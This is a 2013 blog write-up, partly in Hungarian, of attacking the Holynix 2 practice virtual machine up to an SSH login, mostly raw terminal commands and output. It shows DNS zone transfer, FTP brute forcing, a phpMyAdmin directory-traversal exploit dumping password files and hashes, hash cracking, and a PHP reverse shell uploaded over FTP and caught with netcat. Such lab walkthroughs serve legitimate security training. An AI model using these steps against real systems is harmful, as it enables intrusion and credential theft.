2013. november 11., hétfő

Holynix - 2 (to ssh shell)

root@kali:~# netdiscover -r 192.168.1.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                              
                                                                                                                                                            
 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 60                                                                                             
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.1.88    00:0c:29:13:21:b3    01    060   VMware, Inc.                                                                                              


root@kali:~# ifconfig eth0 192.168.1.90 netmask 255.255.255.0
root@kali:~# ping 192.168.1.88
PING 192.168.1.88 (192.168.1.88) 56(84) bytes of data.
64 bytes from 192.168.1.88: icmp_req=1 ttl=64 time=0.843 ms
64 bytes from 192.168.1.88: icmp_req=2 ttl=64 time=0.431 ms

root@kali:~# unicornscan 192.168.1.88
TCP open                 ftp[   21]        from 192.168.1.88  ttl 64
TCP open                 ssh[   22]        from 192.168.1.88  ttl 64
TCP open              domain[   53]        from 192.168.1.88  ttl 64
TCP open                http[   80]        from 192.168.1.88  ttl 64


root@kali:~# nmap -sS -sV -O 192.168.1.88 -pT:21,22,53,80

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-11 09:14 CET
Nmap scan report for 192.168.1.88
Host is up (0.00043s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
53/tcp open  domain  ISC BIND 9.4.2-P2.1
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:13:21:B3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.47 seconds

http://192.168.1.88/

root@kali:~# dig @192.168.1.88 zincftp.com

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> @192.168.1.88 zincftp.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52515
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;zincftp.com.            IN    A

;; ANSWER SECTION:
zincftp.com.        38400    IN    A    192.168.1.88

;; AUTHORITY SECTION:
zincftp.com.        38400    IN    NS    ns1.zincftp.com.
zincftp.com.        38400    IN    NS    ns2.zincftp.com.

;; ADDITIONAL SECTION:
ns1.zincftp.com.    38400    IN    A    192.168.1.88
ns2.zincftp.com.    38400    IN    A    192.168.1.89

;; Query time: 1 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Mon Nov 11 09:17:43 2013
;; MSG SIZE  rcvd: 113

root@kali:~# dig -t axfr @192.168.1.88 zincftp.com

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> -t axfr @192.168.1.88 zincftp.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
root@kali:~# ifconfig eth0 192.168.1.89 netmask 255.255.255.0
root@kali:~# dig -t axfr @192.168.1.88 zincftp.com

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> -t axfr @192.168.1.88 zincftp.com
; (1 server found)
;; global options: +cmd
zincftp.com.        38400    IN    SOA    ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.        38400    IN    NS    ns1.zincftp.com.
zincftp.com.        38400    IN    NS    ns2.zincftp.com.
zincftp.com.        38400    IN    MX    10 mta.zincftp.com.
zincftp.com.        38400    IN    A    192.168.1.88
ahuxley.zincftp.com.    38400    IN    A    192.168.1.88
amckinley.zincftp.com.    38400    IN    A    192.168.1.88
bzimmerman.zincftp.com.    38400    IN    A    192.168.1.88
cbergey.zincftp.com.    38400    IN    A    192.168.1.88
cfinnerly.zincftp.com.    38400    IN    A    192.168.1.88
cjalong.zincftp.com.    38400    IN    A    192.168.1.88
cmahong.zincftp.com.    38400    IN    A    192.168.1.88
cmanson.zincftp.com.    38400    IN    A    192.168.1.88
ddonnovan.zincftp.com.    38400    IN    A    192.168.1.88
ddypsky.zincftp.com.    38400    IN    A    192.168.1.88
dev.zincftp.com.    38400    IN    A    192.168.1.88
dhammond.zincftp.com.    38400    IN    A    192.168.1.88
dmoran.zincftp.com.    38400    IN    A    192.168.1.88
dsummers.zincftp.com.    38400    IN    A    192.168.1.88
evorhees.zincftp.com.    38400    IN    A    192.168.1.88
gwelch.zincftp.com.    38400    IN    A    192.168.1.88
hmcknight.zincftp.com.    38400    IN    A    192.168.1.88
jgacy.zincftp.com.    38400    IN    A    192.168.1.88
jsmith.zincftp.com.    38400    IN    A    192.168.1.88
jstreet.zincftp.com.    38400    IN    A    192.168.1.88
kmccallum.zincftp.com.    38400    IN    A    192.168.1.88
lnickerbacher.zincftp.com. 38400 IN    A    192.168.1.88
lsanderson.zincftp.com.    38400    IN    A    192.168.1.88
lwestre.zincftp.com.    38400    IN    A    192.168.1.88
mta.zincftp.com.    38400    IN    A    10.0.192.48
ncobol.zincftp.com.    38400    IN    A    192.168.1.88
ns1.zincftp.com.    38400    IN    A    192.168.1.88
ns2.zincftp.com.    38400    IN    A    192.168.1.89
rcropper.zincftp.com.    38400    IN    A    192.168.1.88
rfrost.zincftp.com.    38400    IN    A    192.168.1.88
rwoo.zincftp.com.    38400    IN    A    192.168.1.88
skrymple.zincftp.com.    38400    IN    A    192.168.1.88
splath.zincftp.com.    38400    IN    A    192.168.1.88
tmartin.zincftp.com.    38400    IN    A    192.168.1.88
trusted.zincftp.com.    38400    IN    A    192.168.1.34
www.zincftp.com.    38400    IN    A    192.168.1.88
zincftp.com.        38400    IN    SOA    ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 3 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Mon Nov 11 09:19:20 2013
;; XFR size: 42 records (messages 1, bytes 1021)

dig -t axfr @192.168.1.88 zincftp.com | grep 192.168.1.88 | awk '{print $1}' | sed 's/.zincftp\.com.//' > users.txt

dig -t axfr @192.168.1.88 zincftp.com | grep 192.168.1.88 | awk '{print $1}' > hosts.txt

pico /etc/hosts
192.168.1.88    ahuxley.zincftp.com
192.168.1.88    amckinley.zincftp.com
192.168.1.88    bzimmerman.zincftp.com
192.168.1.88    cbergey.zincftp.com
192.168.1.88    cfinnerly.zincftp.com
192.168.1.88    cjalong.zincftp.com
192.168.1.88    cmahong.zincftp.com
192.168.1.88    cmanson.zincftp.com
192.168.1.88    ddonnovan.zincftp.com
192.168.1.88    ddypsky.zincftp.com
192.168.1.88    dev.zincftp.com
192.168.1.88    dhammond.zincftp.com
192.168.1.88    dmoran.zincftp.com
192.168.1.88    dsummers.zincftp.com
192.168.1.88    evorhees.zincftp.com
192.168.1.88    gwelch.zincftp.com
192.168.1.88    hmcknight.zincftp.com
192.168.1.88    jgacy.zincftp.com
192.168.1.88    jsmith.zincftp.com
192.168.1.88    jstreet.zincftp.com
192.168.1.88    kmccallum.zincftp.com
192.168.1.88    lnickerbacher.zincftp.com
192.168.1.88    lsanderson.zincftp.com
192.168.1.88    lwestre.zincftp.com
192.168.1.88    ncobol.zincftp.com
192.168.1.88    ns1.zincftp.com
192.168.1.88    rcropper.zincftp.com
192.168.1.88    rfrost.zincftp.com
192.168.1.88    rwoo.zincftp.com
192.168.1.88    skrymple.zincftp.com
192.168.1.88    splath.zincftp.com
192.168.1.88    tmartin.zincftp.com
192.168.1.88    www.zincftp.com

root@kali:~# cat urls.txt
http://zincftp.com/
http://ahuxley.zincftp.com/
http://amckinley.zincftp.com/
http://bzimmerman.zincftp.com/
http://cbergey.zincftp.com/
http://cfinnerly.zincftp.com/
http://cjalong.zincftp.com/
http://cmahong.zincftp.com/
http://cmanson.zincftp.com/
http://ddonnovan.zincftp.com/
http://ddypsky.zincftp.com/
http://dev.zincftp.com/
http://dhammond.zincftp.com/
http://dmoran.zincftp.com/
http://dsummers.zincftp.com/
http://evorhees.zincftp.com/
http://gwelch.zincftp.com/
http://hmcknight.zincftp.com/
http://jgacy.zincftp.com/
http://jsmith.zincftp.com/
http://jstreet.zincftp.com/
http://kmccallum.zincftp.com/
http://lnickerbacher.zincftp.com/
http://lsanderson.zincftp.com/
http://lwestre.zincftp.com/
http://ncobol.zincftp.com/
http://ns1.zincftp.com/
http://rcropper.zincftp.com/
http://rfrost.zincftp.com/
http://rwoo.zincftp.com/
http://skrymple.zincftp.com/
http://splath.zincftp.com/
http://tmartin.zincftp.com/
http://www.zincftp.com/

geturls.sh
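#!/bin/bash
# geturls.sh — run dirb once against every URL listed in a file, one target
# per line.  Usage: ./geturls.sh [url-list]   (default list: urls.txt)
set -u

url_list=${1:-urls.txt}
[[ -r "$url_list" ]] || { printf 'geturls: cannot read %s\n' "$url_list" >&2; exit 1; }

# Read the list on fd 3 instead of stdin: a child that reads fd 0 (dirb accepts
# keypresses while it scans) could otherwise swallow the remaining lines.
# The `|| [[ -n "$url" ]]` keeps a final line that has no trailing newline.
while IFS= read -r -u 3 url || [[ -n "$url" ]]; do
  # skip blank lines and '#' comments so a scratch list does not launch stray scans
  [[ -z "$url" || "$url" == \#* ]] && continue
  # one failed scan must not abort the rest of the list; report it and go on
  dirb "$url" </dev/null || printf 'geturls: dirb failed for %s\n' "$url" >&2
done 3< "$url_list"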

./geturls.sh > dirbout.txt
...
root@kali:/usr/share/dirb# dirb http://ddonnovan.zincftp.com/
-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Nov 11 10:09:56 2013
URL_BASE: http://ddonnovan.zincftp.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://ddonnovan.zincftp.com/ ----
+ http://ddonnovan.zincftp.com/resume (CODE:200|SIZE:1256)                                                                                                  
+ http://ddonnovan.zincftp.com/server-status (CODE:403|SIZE:342)         

root@kali:/usr/share/dirb# dirb http://dev.zincftp.com/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Nov 11 10:11:41 2013
URL_BASE: http://dev.zincftp.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://dev.zincftp.com/ ----
+ http://dev.zincftp.com/index (CODE:200|SIZE:1205)                                                                                                         
+ http://dev.zincftp.com/index.php (CODE:200|SIZE:1205)                                                                                                     
+ http://dev.zincftp.com/phpMyAdmin (CODE:403|SIZE:333)                                                                                                     
+ http://dev.zincftp.com/register (CODE:200|SIZE:16)                                                                                                        
+ http://dev.zincftp.com/server-status (CODE:403|SIZE:336)   

root@kali:~# medusa -h 192.168.1.88 -U users.txt -P /usr/share/wordlists/rockyou.txt -M ftp -t 1 -v 6 -e ns -g 5 -r 5
...

curl http://ddonnovan.zincftp.com/resume > resume.txt

ifconfig eth0 192.168.1.34 netmask 255.255.255.0

http://dev.zincftp.com/phpMyAdmin/

http://www.zincftp.com/phpMyAdmin/Documentation.html
phpMyAdmin 2.6.4-pl1 Documentation

searchsploit phpmyadmin

phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit                     /php/webapps/1244.pl

perl /usr/share/exploitdb/platforms/php/webapps/1244.pl http://www.zincftp.com /phpMyAdmin/ ../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
cmahong:x:1005:2002::/home/cmahong:/bin/false
lnickerbacher:x:1006:2002::/home/lnickerbacher:/bin/false
jstreet:x:1007:2002::/home/jstreet:/bin/false
rwoo:x:1008:2002::/home/rwoo:/bin/false
kmccallum:x:1009:2002::/home/kmccallum:/bin/false
cjalong:x:1010:2002::/home/cjalong:/bin/false
jsmith:x:1011:2002::/home/jsmith:/bin/false
dhammond:x:1012:2002::/home/dhammond:/bin/false
hmcknight:x:1013:2002::/home/hmcknight:/bin/false
lwestre:x:1014:2002::/home/lwestre:/bin/false
gwelch:x:1015:2002::/home/gwelch:/bin/false
dmoran:x:1016:2002::/home/dmoran:/bin/false
dsummers:x:1017:2002::/home/dsummers:/bin/false
bzimmerman:x:1018:2002::/home/bzimmerman:/bin/false
ncobol:x:1019:2002::/home/ncobol:/bin/false
ddypsky:x:1020:2002::/home/ddypsky:/bin/false
rcropper:x:1021:2002::/home/rcropper:/bin/false
cbergey:x:1022:2002::/home/cbergey:/bin/false
tmartin:x:1023:2002::/home/tmartin:/bin/false
jgacy:x:1024:2002::/home/jgacy:/bin/false
splath:x:1025:2002::/home/splath:/bin/false
evorhees:x:1026:2002::/home/evorhees:/bin/false
rfrost:x:1027:2002::/home/rfrost:/bin/false
ahuxley:x:1028:2002::/home/ahuxley:/bin/false
webmaster:x:1029:2002::/var/www:/bin/false
cmanson:x:1030:2002::/home/cmanson:/bin/false
vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false

root@kali:~# perl /usr/share/exploitdb/platforms/php/webapps/1244.pl http://www.zincftp.com /phpMyAdmin/ ../../../../../etc/pure-ftpd/pureftpd.passwd
cmahong:$1$vUW5q3t0$9RZSkReNoWGCaPtL7ixLX0:1031:2002::/home/cmahong/./::::::::::::
lnickerbacher:$1$yiEZKCE0$BOuvM8nrfoNGWAcjPenpa.:1031:2002::/home/lnickerbacher/./::::::::::::
jstreet:$1$sBGmOuB0$TPHx0jBSFjtJu7dJXb4Nw/:1031:2002::/home/jstreet/./::::::::::::
rwoo:$1$VZxDrE30$p7NPDTkxuQhPSsLpi2a1H1:1031:2002::/home/rwoo/./::::::::::::
cfinnerly:$1$dRGyIOy0$OVGBtLHyxFjPg7tmxtvHY/:1031:2002::/home/cfinnerly/./::::::::::::
kmccallum:$1$dijBzwn0$qlGcbcTT0Qyg8wQf4.QiG1:1031:2002::/home/kmccallum/./::::::::::::
cjalong:$1$FVj4if60$BWSIDiE97oTKUs70qOjZx/:1031:2002::/home/cjalong/./::::::::::::
jsmith:$1$yQKaOpR0$UdySwRtPd1upTckQ5/.CM/:1031:2002::/home/jsmith/./::::::::::::
lsanderson:$1$gzIP52U0$cL6XE61yDZD0unvIIkV8l/:1031:2002::/home/lsanderson/./::::::::::::
dhammond:$1$yK9OuzZ0$W7mgvS4SisxP1BwdLsuy1/:1031:2002::/home/dhammond/./::::::::::::
hmcknight:$1$A07SpdB0$hs/m8KyoJyY3gVAhlWDQI/:1031:2002::/home/hmcknight/./::::::::::::
lwestre:$1$.R5Dbl60$n2ajoJce/LnPVCq497sUQ.:1031:2002::/home/lwestre/./::::::::::::
gwelch:$1$/uYT22Y0$njR3vmLQrbnAugwkNLgJ5/:1031:2002::/home/gwelch/./::::::::::::
dmoran:$1$JZrJXdU0$ORe5.yRgQHCQl6h14rEEe.:1031:2002::/home/dmoran/./::::::::::::
dsummers:$1$VXo3pWp0$v0J7NsxRhDy/ufU01P/ch1:1031:2002::/home/dsummers/./::::::::::::
bzimmerman:$1$rQep6B90$ZtnoFZpTEBkNoRCfqJRpe/:1031:2002::/home/bzimmerman/./::::::::::::
amckinley:$1$45Bz0af0$Fsfo.XXcLkVzSaH5bLjzI0:1031:2002::/home/amckinley/./::::::::::::
ncobol:$1$q.xxgp70$645DFncdOFc24n93la5a70:1031:2002::/home/ncobol/./::::::::::::
ddypsky:$1$ccUhlpJ0$PO/WATKUekwaPct4zXeV9.:1031:2002::/home/ddypsky/./::::::::::::
rcropper:$1$Qhw2Vff0$QDvQMEe9CGFwVrvVUPqTz0:1031:2002::/home/rcropper/./::::::::::::
ddonnovan:$1$1z2APl80$uAyYFZLPu/WRkkpegD3Ht.:1031:2002::/home/ddonnovan/./::::::::::::
cbergey:$1$MOwY3Ie0$LcgARpcVk8Hf8n.E7itC40:1031:2002::/home/cbergey/./::::::::::::
tmartin:$1$3jpH7Yk0$2XmRv6acGEkBjmNQeyzUz.:1031:2002::/home/tmartin/./::::::::::::
jgacy:$1$b.0bYDi0$sSMXaRDSZu8YvWVz.wfCo0:1031:2002::/home/jgacy/./::::::::::::
splath:$1$jbdcsaj0$7uaXto3yRZWwDp5VEbJQV/:1031:2002::/home/splath/./::::::::::::
skrymple:$1$zjyNa1C0$x2JA4Tm61q3N0Fq06gXun1:1031:2002::/home/skrymple/./::::::::::::
evorhees:$1$ITHWZZd0$Qhs38Q7QpRTe./Npk25hu/:1031:2002::/home/evorhees/./::::::::::::
rfrost:$1$3Nqexaj0$eJv5nfOYM71jvlTEA1iv..:1031:2002::/home/rfrost/./::::::::::::
ahuxley:$1$ObpCAT60$LTqCcrqMGAgv8YMyva5Sr0:1031:2002::/home/ahuxley/./::::::::::::
cmanson:$1$gMHNCq70$RCOXC8pfElSRvh5BFc5fF0:1031:2002::/home/cmanson/./::::::::::::
webmaster:$1$v2tdHOX0$MnLOX4cXqZYL99QbDDZ/1/:1031:2002::/var/www/./::::::::::::

root@kali:~# john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 31 password hashes with 31 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
millionaire      (tmartin)
chatterbox1      (cbergey)
bravenewworld    (ahuxley)

guesses: 3  time: 0:03:56:03 DONE (Mon Nov 11 16:31:46 2013)  c/s: 28468  trying:      123d - *7¡Vamos!

root@kali:~#  ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 03:39. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): tmartin
331 User tmartin OK. Password required
Password:
230-User tmartin has group access to:  2002   
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Connecting to port 51201
-rw-r--r--    1 1031     2002         1004 Dec  6  2010 mystuff.rar
drwxr-xr-x    2 1031     2002         4096 Dec  5  2010 web
226-Options: -l
226 2 matches total
ftp> get mystuff.rar
local: mystuff.rar remote: mystuff.rar
200 PORT command successful
150 Connecting to port 60257
226-File successfully transferred
226 0.046 seconds (measured here), 21.22 Kbytes per second
1004 bytes received in 0.05 secs (21.0 kB/s)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 Logout.

unrar l mystuff.rar

UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal

Archive mystuff.rar

 Name             Size   Packed Ratio  Date   Time     Attr      CRC   Meth Ver
-------------------------------------------------------------------------------
*Payroll.xls        80      128 160% 05-12-10 19:55 -rw-r--r-- 0D849616 m3b 2.9
*Contacts.txt      497      560 112% 05-12-10 19:53 -rw-r--r-- D095A304 m3b 2.9
*account_info.doc       80      128 160% 05-12-10 19:59 -rw-r--r-- 0D849616 m3b 2.9
-------------------------------------------------------------------------------
    3              657      816 124%

Ezt még nem sikerült feltörni...de folyamatban van...

root@kali:/var/www/phpshells# ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 04:30. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): tmartin
331 User tmartin OK. Password required
Password:
230-User tmartin has group access to:  2002   
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd web
250 OK. Current directory is /web
ftp> put phpreverse.php
local: phpreverse.php remote: phpreverse.php
200 PORT command successful
150 Connecting to port 44363
226-File successfully transferred
226 0.001 seconds (measured here), 9.93 Mbytes per second
5494 bytes sent in 0.00 secs (31560.2 kB/s)
ftp> quit
221-Goodbye. You uploaded 6 and downloaded 0 kbytes.
221 Logout.
root@kali:/var/www/phpshells# nc -l -v -p 1234
listening on [any] 1234 ...

http://tmartin.zincftp.com/phpreverse.php

connect to [192.168.1.34] from ahuxley.zincftp.com [192.168.1.88] 55994
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 04:31:36 up  4:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
$ ls /home
ahuxley
amckinley
bzimmerman
cbergey
cfinnerly
cjalong
cmahong
cmanson
ddonnovan
ddypsky
dhammond
dmoran
dsummers
evorhees
gwelch
hmcknight
jgacy
jsmith
jstreet
kmccallum
lnickerbacher
lsanderson
lwestre
ncobol
rcropper
rfrost
rwoo
skrymple
splath
tmartin

$ ls /home/amckinley
my_key.eml
web

$ cat /home/amckinley/my_key.eml
Delivered-To: amckinley@zincftp.com
Received: by 10.14.53.2 with SMTP id f2cs104681eec;
        Sun, 5 Dec 2010 19:20:58 -0800 (PST)
Received: by 10.229.81.74 with SMTP id w10mr4003536qck.75.1291605657402;
        Sun, 05 Dec 2010 19:20:57 -0800 (PST)
Return-Path:
Received: from mta.zincftp.com (mta.zincftp.com [10.0.192.48])
        by mta.zincftp.com with ESMTP id m12si9791432qck.133.2010.12.05.19.20.57;
        Sun, 05 Dec 2010 19:20:57 -0800 (PST)
Received-SPF: neutral (zincftp.com: 10.0.192.48 is neither permitted nor denied by best guess record for domain of lsanderson@zincftp.com) client-ip=10.0.192.48;
Authentication-Results: mta.zincftp.com; spf=neutral (zincftp.com: 10.0.192.48 is neither permitted nor denied by best guess record for domain of lsanderson@zincftp.com) smtp.mail=lsanderson@zincftp.com
Received: by mta.zincftp.com with SMTP id 5so10705863qwg.31
        for <amckinley@zincftp.com>; Sun, 05 Dec 2010 19:20:57 -0800 (PST)
MIME-Version: 1.0
Received: by 10.229.96.136 with SMTP id h8mr3946849qcn.184.1291605656745; Sun,
 05 Dec 2010 19:20:56 -0800 (PST)
Received: by 10.229.67.90 with HTTP; Sun, 5 Dec 2010 19:20:56 -0800 (PST)
X-Originating-IP: [10.45.6.113]
Date: Sun, 5 Dec 2010 22:20:56 -0500
Message-ID:
Subject: RE: I forgot my ssh password
From: Lyle Sanderson <lsanderson@zincftp.com>
To: amckinley@zincftp.com
Content-Type: multipart/alternative; boundary=0016364edc1c5c38940496b56067

--0016364edc1c5c38940496b56067
Content-Type: text/plain; charset=ISO-8859-1

I can't retrieve your password only the hash, so I've reset it for you.
Your new password is your first and last name, all lower case, followed by 2ba9

You should change it when you log in.

$ ls /home/hmcknight
books.rar

$ ls /home/ncobol
blowfish.py
commonPorts

$ cat /home/ncobol/commonPorts
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
79 Finger
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
115 SFTP (Secure File Transfer Protocol)
119 NNTP (Network New Transfer Protocol)
123 NTP (Network Time Protocol)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP (Lightweight Directory Access Protocol)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
666 Doom
993 SIMAP (Secure Internet Message Access Protocol)
995 SPOP (Secure Post Office Protocol)


amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash

password: agustinmckinley2ba9

root@kali:~# ssh amckinley@192.168.1.88
amckinley@192.168.1.88's password:
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
amckinley@holynix2:~$


Next phase: Privilege escalation.
